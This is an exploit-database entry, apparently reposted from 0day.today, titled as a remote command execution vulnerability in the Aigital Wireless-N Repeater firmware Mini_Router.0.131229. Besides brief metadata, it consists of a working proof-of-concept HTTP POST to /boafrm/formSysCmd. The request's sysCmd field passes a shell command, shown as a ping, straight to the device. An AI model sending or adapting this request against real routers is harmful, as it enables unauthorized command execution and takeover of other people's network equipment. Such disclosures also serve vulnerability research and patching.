id: 38633
date: 04/28/2023
title: Aigital Wireless-N Repeater Mini_Router.0.131229 Remote Command Execution Vulnerability
author: Matteo Mandolini
cves: 

# Exploit Title: Aigital Wireless-N Repeater - Command Injection
# Exploit Author: Matteo Mandolini
# Date : 13/04/2023
# Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/
# Version: Mini_Router.0.131229

Command Injection

POST /boafrm/formSysCmd HTTP/1.1
Host: 192.168.10.253
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://192.168.10.253
Connection: close
Referer: http://192.168.10.253/setok.htm
Upgrade-Insecure-Requests: 1

sysCmd=ping+-c10+192.168.10.101

#  0day.today [2023-05-01]  #